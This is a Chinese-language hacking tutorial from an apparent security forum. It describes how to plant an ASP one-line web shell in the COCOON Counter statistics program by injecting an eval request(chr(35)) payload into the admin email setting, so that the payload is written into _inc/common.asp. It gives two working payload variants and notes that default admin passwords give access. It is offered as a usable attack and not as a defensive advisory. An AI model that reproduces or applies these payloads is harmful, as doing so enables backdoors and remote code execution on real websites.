COCOON Counter统计程序后台写马

所属分类: 实用技巧 / 漏洞研究 阅读数: 895
收藏 0 赞 0 分享
来源:邪恶八进制  作者:9xiao 
   引用最新海洋顶端eval版中的几句话,这里要用到的是<%eval request(chr(35))%>, 
"evalExecutePP.htm的文本框里自己写的代码就是添用2006X2.exe转换后生成的那个html文本框里的代码。什么是文本框大家知道吧?不知的就去查查html吧。这样添好了,就可以用自己的做的c端了。如果不会,你就用我的那个现成的“2006c端的例子.htm”吧。 
S端是<%eval(request("#"))%>或<%eval request("#")%>或<%eval request(chr(35))%>等等,或不用%,自己变形吧,不多说了" 
   偶在本地架设了一个环境,实际操作中不能写错否则后悔就来不急了,在管理信箱那把cnhacker@263.net":eval request(chr(35))//复制过去,,点击保存,看下_inc/common.asp的内容 
WebMasterEmail       =   "cnhacker@263.net\":eval request(chr(35))//"嘿嘿来执行下,嘿嘿!成功了,统计程序中的后台拿将"转义成了\"所以这用了evalrequest(chr(35))嘿嘿,//是注释,:在asp中就是换行,前提就是你能进到后台,(好多后台管理密码都是admin嘿嘿)php也可以这样的嘿嘿,而且比asp利用的地方更多!需要动下配置语句的前后搭配好,利用好一些符号。  
另注:黑防8期也提到了类似方法这里就贴出来,黑防中的代码可以写成9xiao"%><%eval request(chr(35))%><%',这个方法也比较巧妙,//和'在asp都是注释语句!此统计程序还有暴库的地方这个就不公布了! 
关于php的可以参考saiy写的phpwind后台得shell的三种方法。 
更多精彩内容其他人还在看

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码
收藏 0 赞 0 分享

跨站脚本攻击+Cookies欺骗(Discuz篇)

跨站脚本攻击+Cookies欺骗(Discuz篇)
收藏 0 赞 0 分享

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞
收藏 0 赞 0 分享

关于对SQL注入80004005 及其它错误消息分析

关于对SQL注入80004005 及其它错误消息分析
收藏 0 赞 0 分享

针对蓝牙PIN码的最新攻击技术细节分析

针对蓝牙PIN码的最新攻击技术细节分析
收藏 0 赞 0 分享

细说3721网络实名“病毒”

细说3721网络实名“病毒”
收藏 0 赞 0 分享

浅谈SQL SERVER数据库口令的脆弱性

浅谈SQL SERVER数据库口令的脆弱性
收藏 0 赞 0 分享

MSHTA漏洞为黑客大开远程控制之门(图)

MSHTA漏洞为黑客大开远程控制之门(图)
收藏 0 赞 0 分享

再探九酷网络个人主页空间管理系统

再探九酷网络个人主页空间管理系统
收藏 0 赞 0 分享

黑客突破防火墙常用的几种技术

黑客突破防火墙常用的几种技术
收藏 0 赞 0 分享
查看更多